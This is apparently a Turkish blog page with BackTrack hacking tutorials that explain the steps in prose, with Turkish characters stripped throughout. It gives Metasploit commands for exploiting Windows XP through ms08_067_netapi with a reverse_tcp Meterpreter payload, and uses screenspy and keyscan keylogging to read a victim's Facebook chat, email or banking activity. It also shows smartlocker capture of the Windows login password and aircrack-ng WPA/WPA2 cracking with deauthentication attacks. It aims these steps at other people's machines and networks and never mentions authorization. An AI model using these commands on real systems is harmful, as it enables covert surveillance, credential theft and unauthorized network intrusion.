You are on page 1of 15

Facebook Chat takibi Bu Backtrack eitiminde exploit edilmi bir sistem zerindeki internet taraycs zerinden kiinin bal

bulunduu facebook chat'ine szmay gstereceim. Buradaki Backtrack eitiminde bir sistemin nasl exploit edileceini gstermitim imdi ayn exploiti kullandmz var sayarak bir ka adm geriye gidiyoruz.

***Sistemi Exploit ettik*** Buraya kadarki ksm nceki backtrack makalesinde yer alyordu imdi buradan sonra farkl bir yol izleyip kiinin facebook chatine szacaz. Screenspy'mz altryoruz , eer screenspy'n baka hangi modlarda altn grmek istiyorsanz "run screenspy -h" komutunu girmeniz gerekli. Biz screen spymz 1 sn gecikme sresi ile birlikte 60sn boyunca altracaz bunun iinde "run screenspy -d 1 -t 60" komutunu kullanyoruz. -d = delay , -t = time Bu yntem zellikle facebook chati grntlemek deil kiinin o an internet taraycsnda ne yaptn grntlemek iindir , ben sadece olas bir seneryo yarattm. Ayn eyi internet taraycs yerine lotus notes'a yaparsanz kiinin irket maillerini okumanz salar yada o srada banka hesabnda ilem yapyorsa ve takviminden nereye gideceini yazyorsa onlarada eriebilirsiniz , hedef program semek size kalm keylogger mantyla alyor fakat kiinin bir dosya amas gerekmiyor.

***backtrack zerinde screenspy altrdk*** nceki yazda bahsettiim "ps" komutuyla yine alan programlar grntlyoruz.

***PS kts*** Firefox'u migrate edeceiz.Komutumuz "migrate process id" eklinde firefox'un process idsi 2220 olduu iin "migrate 2220" yazyoruz backtrack'e. Eer siz opera'y izleyecek olsaydnz onun process idsini girmeniz gerekmekteydi.

***Firefox migration*** imdi keyscan'i balatacaz yani keyloggermz. "keyscan_start" komutunu veriyoruz.

***Keyscan biraz zaman alacak*** keyscan bittikten sonra "keyscan_dump" komutuyla kiinin o an ne yaptn grntleyebiliyoruz.

Backtrackte konrolu ele alma , ettercap:nmap:metasploit Backtrack Aralar: Metasploit adl balmda bir exploiti kullanmann nasl bir ey olduunu anlatmtm imdi burada biraz daha ayrntl ksmn gstereceim. nce vulnerable bir sistem bulmamz gerekli bunun iin bu backtrack eitiminde ettercap adnda bir yazlm kullancaz. Ettercap backtrack'in barndrd bir a dinleme yazlmdr. MITM (man in the middle) saldrlar dahil bir sr zellie sahiptir. Konsola "ettercap -h" yazdmda kullanm ile ilgili bir kt alacaksnz. -h komutunu backtrackteki tm aralar iin kullanabilirsiniz size hatr saylr bilgiler verecektir. Biz bu yazda ettercap'in gtk arayzn kullancamzdan -G komutunu veriyoruz. imdi ettercap'i kullanarak hedef olacak bilgisayarlarn ip adreslerini grelim.

***ettercap -G komutu***

***ettercap gtk arayz*** imdi ettercap'in sniff sekmesinden unified sniff 'i seiyoruz. Sradaki aama ok nemli nk tarayacamz alan belirliyecek. wlan0 wirelesslar iin eth0 kablolu balantlar iin hatta vmware zerine kurulu bir sisteme eriim iin ki ben anlatmmda yle yapacam vmnet1 i kullanacam.

***ettercap network arayz***

***Ettercap taramas sonular***

"Hosts" sekmesine girip "scan for hosts" a tklyoruz ve bize evremizdeki setiimiz network tipine gre balanabileceimiz makineleri gsteriyor , dikkat edilmesi gereken bir durum var burada ip ve mac adresleriyle birlikte listelenen bilgisayarlar vulnerabledr diyemeyiz nk , daha onlar hakknda bir bilgimiz yok sadece internete bizim setiimiz network tipine gre bal olduunu bilmekteyiz. imdi ettercap ktsna gre bir bilgisayar seiyoruz. Ben 192.168.0.128 ip adresli bilgisayar kullanacam. Sradaki ilem bu ipli bilgisayar hakknda bilgi edinme. Hangi iletim sistemini kullanyor? , Hangi portlar ak? bu sorularn cevaplarna gre uygun exploiti seeceiz. Bunun iin backtrackteki nmap adndaki bir aratan yararlanacaz.Eer elinizde farkl bir iletim sistemi varsa onun zerine nmap ykleyip ayn ekilde kullanabilirsiniz bildiim kadaryla tm unix,linux ve maclerde almakta. Nmap , adndanda anlalabilecei gibi bir network mapperdr yani bir an haritasn karr. Nmap ile adaki hostlar belirleyebilir, kullandklar iletim sistemlerini bulabilir , alan servisleri ve ak portlar grntleyebiliriz. Kullanm iin "nmap -h" komutunu kullanabilirsiniz.Bu backtrack eitiminde nmap -O seeneini kullanacaz bize portlar ve iletim sistemi hakkndaki zellikleri gsterecek.

****nmap -O ip adresi eklinde kullanlr*** Grdnz gibi hedef sistem Windows xp sp2 yada sp3 kullanyor biz imdi o sisteme etki eden bir exploit kullanacaz. imdi daha nceki backtrack eitiminde anlattm gibi metasploiti ayoruz. cd /pentest/exploits/framework3/ ./msfconsole

***Backtack eitimi:metasploit***

Metasploiti her atnzda "svn update" (gnlk yapmanz yeterlidir) komutunu kullanmanz neririm bu makalede belirli bir exploit kullancaz fakat bu komut sayesinde yeni gelen exploitleride metasploit konsolunda grebilirsiniz. Bu saldr iin kendi ip adresinizide bilmeniz gerekiyor exploitimiz byle alyor exploiti ykleyince " show options" ilede gereklilikleri grntleyebilirsiniz imdi yeni bir konsolda ip adresinizi bilmiyorsanz "ifconfig" komutuyla grntleyebilirsiniz. Bu saldrda 445 nolu porttan sisteme giri yapacaz. Kullanacamz exploit ise ms08_067_netapi use windows/smb/ms08_067_netapi set payload windows/meterpreter/reverse_tcp komutlarn vererek exploit ve payloadmz yklyoruz.

***exploiti ve payload ykledikten sonra show options komutuyla gereken eyleri grntleyebiliriz*** eer show optionsu kullandysanz RHOST ve LHOSTU ayarlamamz gerektiini grmsnzdr.Ben yinede resmini vereyim.

***stteki exploitin optionsu , alttaki ise payloadn***

grdnz gibi RHOST un yannda gerekliliin altnda yes yazyor buda demek oluyor ki saldracanz kiinin ip adresinize ihtiyacnz var ayn zamanda altndaki RPORTta ise 445 nolu portu kullanmalsnz diyor , payloadmzdada ayn eyleri grebilirsiniz LHOST u ayarlamamz gerektii gibi.... imdi bunlar halledelim.

***RHOST ve LHOST 'u ayarladk*** imdi sra geldi altrmaya "exploit" diyerek kullanyoruz.

exploitimiz yapt eyleri bize adm adm gsteriyor :) imdi bilgisayar payloadmzn el verdiince kullanabileceimiz bir alan haline geldi. Amacmz kiinin giri ifresini renmek olsun. Sistemi exploit ettikten sonra meterpreter shelle geti grdnz gibi.

imdi "ps" komutuyla bir nevi kiinin bilgisayarnda ctrl+alt+del yapyoruz ama biraz daha detayl.

***ps komutu kts*** imdi meterpretera "migrate 672" komutunu veriyoruz ardndan smartlocker adl scriptimizi altryoruz.

***smart locker help kts***

***Grdnz gibi ifreyi kaydetti*** Smartlocker'n gsterdii klasre giderek ifreye eriebiliriz. not:ettercap backtrack 5 te dzgn almyor en ksa srede backtrack takmnn dzelteceine eminim.

Basit Metasploit kullanm

Balangta Metasploit zerinde durmam backtrackin wirelesstaki nn duyupta gelenlerin cann skabilir fakat metasploit gvenlik testlerinin backtrack iin en nemli unsurlarndan biridir. Metasploit sayesinde bir sistemi tamamen ele geirebilir onunla istediinizi yapabilirsiniz , srekli gelien exploit arivini hesaba katarsakta metasploiti verebilecei zarar yznden n planda tutuyorum , wireless ksmnada geleceim. Backtrackte metasploiti amak iin; Applications/Backtrack/Exploitation Tools/Network Exploitation Tools/Metasploit Framework/msfconsole Konsolda , cd /pentest/exploits/framework3/ sonra ./msfconsole yazabilirsiniz. ikincisi bir sre altktan sonra size daha rahat gelecektir.

***Karnza Gelmesi Gereken ekran***

***msfconsole komut listesi*** Grdnz gibi backtrackimizin msfconsole'una "?" komutunu verdiimizde metasploitin temel komutlarn grntlemektesiniz , ou zaman bunlar hayat kurtarc olacak... basit birka komutla metasploite giri yapalm exploit databaseini update etmek iin konsola ; svn update yazmanz gerekli eer update varsa aadaki gibi bireyle karlacaksnz.

***backtrack metasploit update***

Metasploitte tm scriptler belirli bir dzen ierisindedir. Daha nce bahsettiim "ls" (listelemek iin) "cd" komutlarn kullanarak konsoldan gezebilirsiniz yada Places ksmndan pentest klasrne girerek tm scriptlerin belirli bir dzen ierisinde olduunu grebilirsiniz. Bu sadece backtrack iin geerli deil tm metasploit kullanan linuxler iin geerlidir.(windowsta denemediimden bilmiyorum) Exploit arama az nce "?" komutu ile basit komutlar gstermitim onlardan biride "search" komutu bu komut sayesinde benim saldracam bir hedef varsa rnein; vulnerable bir windows os benim metasploitteki aramam u ekilde olmal msf> search windows listelenen exploitlerin yannda Ranklar ve k tarihleri yazmaktadr. Kullanlan exploit ne kadar yeniyse hedef olan sistemin o a kapatma olasl o kadar dktr. Ayrca Rank ksmda denemelere gre bir derecelendirmedir , rank ne kadar yksekse o kadar iyi sonu vermektedir. Description ksmndansa exploitin nereye saldrdn grebiliriz. exploiti "use exploit ad" eklinde kullanyoruz. exploitin zelliklerini ise "show options" diyerek grebiliriz. bir sonraki yazmda backtrackte windows ifresini grntlemek iin bir exploit kullanacam.

Wpa/wpa2 ifresi krma


wpa ev kullanclarnn en ok kulland ifreleme yntemidir ve wep ifrelerinden ok daha zor krlr. ncelikle

"airmon-ng start wlan0" komutunu veriyoruz.

karmza gelmesi gereken ekran

"airodump-ng mon0"

Paket toplama ilemi

Bu aamadan sonra ifresi krlcak olan an baz eylerini not etmeniz gerekiyor.

not etmeniz gerekenler

"airodump-ng --channel 11 --write output --bssid 00:1C:A8:91:42:22 mon0"

channel'a saldrlacak an channel , bssidyede saldrlacak an ki girilmeli bunlar benim setiim

karmza gelmesi gereken ekran ( eilen ala ilgili paket toplama ilemi)

Bu ilem devam ederken wpa ifre krmasn kolaylatrmak iin hedef aa bir saldrda daha bulunacaz. shift + ctrl + T ye basarak yeni bir konsol an ve "aireplay-ng --deauth 1 -a 00:1C:A8:91:42:22 -c 00:13:02:0D:5D:89 mon0" komutu girin.

sonunda mon0 olucak!

bu ilemden sonra ilk pencerede handshake yakalam olmanz gerekli.

Handshake

imdi "aircrack-ng output-01.cap -w /pentest/passwords/wordlists/wpa.txt" bu komutu kullanarak aircrack'e wpa ifresini krdrabilirsiniz. Benim wordlistim /pentest/passwords/wordlists/wpa.txt olduu iin ben yle belirttim sizinki nerde ise siz oray belirtmelisiniz.

ifreniz belirli bir sre sonunda worldlistle eleirse krlacaktr.

Posted in: wpa, wpa ifre krma, wpa2, wpa2 ifre krma

#Payla!:- BlinkList + Blogmarks + Digg + Del.icio.us + Ekstreme Socializer + Feedmarker + Furl + Google Bookmarks + ma.gnolia + Netvouz + RawSugar + Reddit + Scuttle + Shadows + Simpy + Spurl + Technorati + Unalog + Wink Wep ifresi krma

06:22 / Comments (0) / by Sinan

Backtrack linux'n nlenme sebeplerinin banda gelen wireless ifre krmadr. Fakat gnmzde pek wep ifresi kalmad iin bunu birinin blogunda bulduum video ile gemek istiyorum.Videoda herey detayl bir ekilde aklanm yinede wep ifre krma ile ilgili sorularnz olursa yorum ksmndan sorabilirsiniz.

backtrackte wireless ifresi krarken internetinizin olmas gerekmez. ifre krmak iin world lise ihtiyacnz var , backtrack 5'in iinde geliyor fakat bu demek deil ki ben her wireless'a girebilirim. World listler szlk gibidir ilerinde ok sayda szck bulundururlar ve bizim burada yaptmz saldr o szckleri modem ifresi olarak denemektir. Bu yzden szckler yaadnz yere gre farkllk gsterecektir yani backtrackin ingilizce hazrlad wordlist Trkiye'deki kiilerin adsl ifrelerinin trke szckler iereceini dnrsek daha az kullanl olacaktr.

You might also like